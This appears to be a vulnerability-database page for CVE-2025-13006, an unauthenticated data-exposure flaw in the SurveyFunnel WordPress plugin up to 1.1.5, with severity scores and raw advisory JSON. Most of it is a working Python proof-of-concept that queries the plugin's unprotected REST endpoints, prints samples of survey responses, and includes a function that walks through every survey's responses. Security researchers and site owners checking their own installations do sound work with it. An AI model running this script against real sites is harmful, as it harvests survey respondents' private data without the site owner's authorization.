Security Vulnerability Report
CVE-2025-13006 CVSS 5.3 MEDIUM

CVE-2025-13006

Published: 2025-12-05 05:16:57
Last Modified: 2026-04-15 00:35:42

Description

The SurveyFunnel – Survey Plugin for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via several unprotected /wp-json/surveyfunnel/v2/ REST API endpoints. This makes it possible for unauthenticated attackers to extract sensitive data from survey responses.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SurveyFunnel Plugin for WordPress <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-13006 PoC - Unauthenticated Sensitive Information Disclosure
# Target: SurveyFunnel WordPress Plugin < 1.1.6
#
# Per the advisory, versions up to and including 1.1.5 expose several
# /wp-json/surveyfunnel/v2/ REST routes without an authentication check;
# the remediation printed below is to upgrade to 1.1.6 or later.
# The script only issues unauthenticated GET requests and inspects the
# HTTP status and body; it does not modify anything on the target.


def check_vulnerability(target_url: str) -> bool:
    """
    Check if the target WordPress site is vulnerable to CVE-2025-13006.

    Each REST endpoint in ``endpoints`` is requested without credentials.
    A 200 response carrying a non-empty JSON body is reported as exposed;
    a 401 is reported as protected (the expected behaviour once the
    endpoint enforces authentication); a 404 as absent.

    Args:
        target_url: Base URL of the WordPress site; a trailing slash is
            stripped before the endpoint paths are appended.

    Returns:
        True if at least one endpoint returned a non-empty JSON body
        without authentication, otherwise False.
    """
    base_url = target_url.rstrip('/')

    # List of vulnerable API endpoints
    endpoints = [
        '/wp-json/surveyfunnel/v2/surveys/',
        '/wp-json/surveyfunnel/v2/surveys/1',
        '/wp-json/surveyfunnel/v2/responses/',
        '/wp-json/surveyfunnel/v2/responses/1',
        '/wp-json/surveyfunnel/v2/questions/',
        '/wp-json/surveyfunnel/v2/answers/'
    ]

    print(f"[*] Testing target: {base_url}")
    print(f"[*] CVE-2025-13006 - SurveyFunnel Unauthenticated Info Disclosure\n")

    vulnerable = False

    for endpoint in endpoints:
        url = base_url + endpoint
        print(f"[+] Testing endpoint: {endpoint}")

        try:
            # Send unauthenticated GET request
            # NOTE(review): verify=False disables TLS certificate validation,
            # so the probe will also accept a self-signed or intercepted
            # endpoint; acceptable for a lab check, not for anything that
            # relies on the response being authentic.
            response = requests.get(url, timeout=10, verify=False)

            if response.status_code == 200:
                try:
                    data = response.json()
                    if data:
                        print(f" [!] VULNERABLE - Endpoint returned data without authentication")
                        # Only the first two items of a list (or the whole
                        # object otherwise) are serialised, and the dump is
                        # cut to 500 characters to keep the output short.
                        print(f" [+] Response sample: {json.dumps(data[:2] if isinstance(data, list) else data, indent=2)[:500]}...")
                        vulnerable = True
                except json.JSONDecodeError:
                    # 200 with a non-JSON body: not counted as exposure.
                    print(f" [*] Endpoint exists but returned non-JSON data")
            elif response.status_code == 401:
                print(f" [-] Protected - Authentication required")
            elif response.status_code == 404:
                print(f" [-] Not found")
            else:
                print(f" [*] Status code: {response.status_code}")

        except requests.exceptions.RequestException as e:
            # Connection/timeout errors are reported per endpoint and the
            # scan continues with the next one.
            print(f" [!] Request error: {e}")

    if vulnerable:
        print(f"\n[!] Target is VULNERABLE to CVE-2025-13006")
        print("[*] Recommendation: Upgrade SurveyFunnel plugin to version 1.1.6 or later")
    else:
        # A negative result is not conclusive: the plugin may simply be absent.
        print(f"\n[*] Target may not be vulnerable or SurveyFunnel plugin is not installed")

    return vulnerable


def extract_all_data(target_url: str) -> None:
    """
    Extract all available survey data from vulnerable endpoints.

    Lists the surveys exposed by the ``surveys`` route and, for each one,
    requests its responses and prints only a count. Nothing is written
    to disk; output goes to stdout. Not called from ``__main__``.

    Args:
        target_url: Base URL of the WordPress site; a trailing slash is
            stripped before the endpoint paths are appended.
    """
    base_url = target_url.rstrip('/')
    print(f"\n[*] Extracting data from vulnerable endpoints...")

    # Endpoint to list all surveys
    surveys_url = base_url + '/wp-json/surveyfunnel/v2/surveys/'

    try:
        # NOTE(review): verify=False disables TLS certificate validation here too.
        response = requests.get(surveys_url, timeout=10, verify=False)
        if response.status_code == 200:
            surveys = response.json()
            # NOTE(review): assumes the body is a JSON array of objects with
            # an 'id' key; a dict or scalar body would make len()/iteration
            # below raise and fall into the generic handler.
            print(f"[+] Found {len(surveys)} surveys")

            for survey in surveys:
                survey_id = survey.get('id')
                print(f"\n[*] Survey ID: {survey_id}")
                print(f" Title: {survey.get('title', 'N/A')}")

                # Get responses for this survey
                responses_url = f"{base_url}/wp-json/surveyfunnel/v2/responses/?survey_id={survey_id}"
                resp_response = requests.get(responses_url, timeout=10, verify=False)

                if resp_response.status_code == 200:
                    responses = resp_response.json()
                    print(f" Responses count: {len(responses)}")

    except Exception as e:
        # Broad catch: any request, decoding or shape error ends the
        # extraction with a single message rather than a traceback.
        print(f"[!] Error extracting data: {e}")


if __name__ == '__main__':
    import sys

    # Usage: one positional argument, the site's base URL. Only the
    # read-only status check runs; extract_all_data() is never invoked here.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13006-poc.py <target_url>")
        print("Example: python cve-2025-13006-poc.py http://example.com")
        sys.exit(1)

    target = sys.argv[1]
    check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13006", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:16:56.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SurveyFunnel – Survey Plugin for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via several unprotected /wp-json/surveyfunnel/v2/ REST API endpoints. This makes it possible for unauthenticated attackers to extract sensitive data from survey responses."}, {"lang": "es", "value": "El plugin SurveyFunnel – Survey Plugin para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 1.1.5, incluida esta, a través de varios endpoints desprotegidos de la API REST /wp-json/surveyfunnel/v2/. Esto permite a atacantes no autenticados extraer datos sensibles de las respuestas de la encuesta."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/wpeka/surveyfunnel-lite/blob/master/includes/class-surveyfunnel-lite-rest-api.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/surveyfunnel-lite/tags/1.1.5/includes/class-surveyfunnel-lite-rest-api.php", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/f43f69f0-6995-4789-acf3-8019227effe1?source=cve", "source": "[email protected]"}]}}